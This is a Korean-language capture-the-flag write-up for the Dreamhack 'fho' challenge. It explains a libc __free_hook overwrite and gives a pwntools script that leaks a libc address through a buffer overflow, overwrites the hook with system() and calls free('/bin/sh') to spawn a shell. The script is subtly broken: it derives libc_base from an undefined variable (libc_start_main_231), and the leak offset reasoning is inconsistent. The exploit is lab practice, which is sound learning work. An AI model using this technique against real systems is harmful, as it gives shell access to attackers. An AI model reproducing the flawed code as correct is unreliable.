fho

---

fho

문제 풀이

모든 보호 기법이 적용되어 있네요.. 와우

들어가기 전에 알아두면 좋은 용어

키워드

Hooking: 어떤 함수, 프로그램, 라이브러리를 실행하려 할 때 이를 가로채서 다른 코드가 실행되게 하는 기법. 디버깅, 모니터링, 트레이싱에 사용될 수 있으며, 공격자에 의해 키로깅이나 루트킷 제작에 사용될 수 있음. Hook Overwrite: 바이너리에 존재하는 훅을 덮어써서 특정 함수를 호출할 때, 악의적인 코드가 실행되게 하는 공격 기법. 메모리 관리와 관련된 malloc, free, realloc등의 함수가 라이브러리에 쓰기 가능한 훅 포인터를 가지고 있어서 공격에 사용될 수 있음. Full RELRO를 우회하는 데 사용될 수 있음. one_gadget: 실행하면 셸이 획득되는 코드 뭉치. david942j가 만들어놓은 툴을 사용하면 libc의 버전마다 유효한 one_gadget을 쉽게 찾을 수 있음.

---

Exploit 설계

그럼 저희는 이전에 했던 거처럼 system()함수의 주소를 알아내어 최종적으로 system("/bin/sh") 호출!
그러기 위해 read()함수와 write()를 사용할 것입니다. 실제 주소를 leak하는 방식은
이전에 배웠으므로 생략하겠습니다.

그 다음으로 저희는 rop chain을 이용해 overwirte 해주고 이번엔 bss 영역을 활용하여 접근할거예요
참고로 bss 영역을 사용할 수 있는 이유는 Paritial RELRO 때문인데 추후에 배울 내용이니까 넘어가죠보시면 1번째에 bof로 leak baes를 획득
2번째로 Overwiret로 free_hook과 system을 획득할 수 있습니다.
그리고 one_gadget이라고 불리는 셸이 획득되는 코드 뭉치를 활용하여 쉽게 찾을 수 있다고 하므로

sudo apt-get install ruby-full
gem install one_gadget

로 다운로드 한 후 버전에 맞게 상황에 맞게 가젯을 사용하거나 제약 조건을 만족하게 조작해줍니다.
one_gadget은 함수에 인자를 전달하기 어려울 때 유용하게 사용되므로 동적할당에 유용하죠
예시로 malloc을 호출 시 인자를 검사하여 작은 정수만 입력되는 상황에 "/bin/sh"는 전달이 힘들죠

이때 사용하는 방법이 있습니다!

---

Exploit

우리가 최종적으로 호출해야 하는 함수는 system("/bin/sh")라는 것을 유념하며, 시작해봅시다!
우선 lib의 주소를 구해서 system()의 실제 주소를 구한다 그럼 PIE 덕분에 ret gadget을 이용해
이전처럼 read의 got를 출력하기도 그런 경우입니다. 그럼 stack의 내부에 있는 libc 함수를 활용!

main함수에 ret는 __libc_start_main()으로 이 부분을 활용해야겠습니다.

gdb를 활용해 bt를 입력 시 stack에 있는 함수드르이 현황을 확인 가능한데
main() 아래 우리가 찾던 libc..가 존재함을 확인 할 수 있었습니다!

main()에 bp를 걸어 디버깅 하면 rsp 부분에 +122 을 확인할 수 있습니다
이를 활용해 one_gadget 즉, free heap overwrite를 할 수 있겠죠

다음으로 free()가 호출되고 그 다음에 자연스럽게 __free_hook()이라는 훅을 후킹하기 위해
해당 주소를 system()으로 덮은 뒤 free("/bin/sh")을 하게 된다면 자연스럽게 system("/bin/sh")가 되겠죠
__free_hook()의 경우 free()와 같은 인자를 갖기에 가능한 부분입니다!

one_gadget와 같은 부분은 아직까지는 사용하는 방법을 잘 몰라서 이런 식으로 작성하였습니다
어찌보면 RTL의 응용같네요 그래서 그렇게 중요하다고 하는걸까요?

from pwn import *
 
def log(a, b):
    return success(": ".join([a, hex(b)]))
 
p = remote("host3.dreamhack.games", 11837)
e = ELF("./fho")
libc = ELF("./libc-2.27.so")
 
libc_start_main_offset = libc.symbols["__libc_start_main"]
system_offset = libc.symbols["system"]
free_hook_offset = libc.symbols["__free_hook"]
binsh_offset = next(libc.search(b"/bin/sh"))
 
payload = b'A'*0x48
p.sendafter("Buf: ", payload)
p.recvuntil(payload)
libc_start_main_122 = u64(p.recvn(6) + b'\x00'*2)
libc_base = libc_start_main_231 - (libc_start_main_offset + 122)
system_address = libc_base + system_offset
free_hook_address = libc_base + free_hook_offset
binsh_address = libc_base + binsh_offset
 
log("libc_base", libc_base)
log("libc_start_main_122", libc_start_main_122)
log("system() address", system_address)
log("free_hook address", free_hook_address)
log("\"/bin/sh\" address", binsh_address)
 
p.sendlineafter("To write: ", str(free_hook_address))
p.sendlineafter("With: ", str(system_address))
 
p.sendlineafter("To free: ", str(binsh_address))
 
p.interactive()
                

전체적인 코드는 해당 fho를 설명하는 dreamhack의 사이트의 자료를 참고하였으며
세부적인 구성은 위에 작성하므로 세부적인 내용은 그 자료를 참고하시면 될 거 같습니다

또한 hook은 libc의 주소에 있는 내용을 참고하기 때문에 위와 같은 내용을 확인한답니다!

---

참고 자료

 

참고 이미지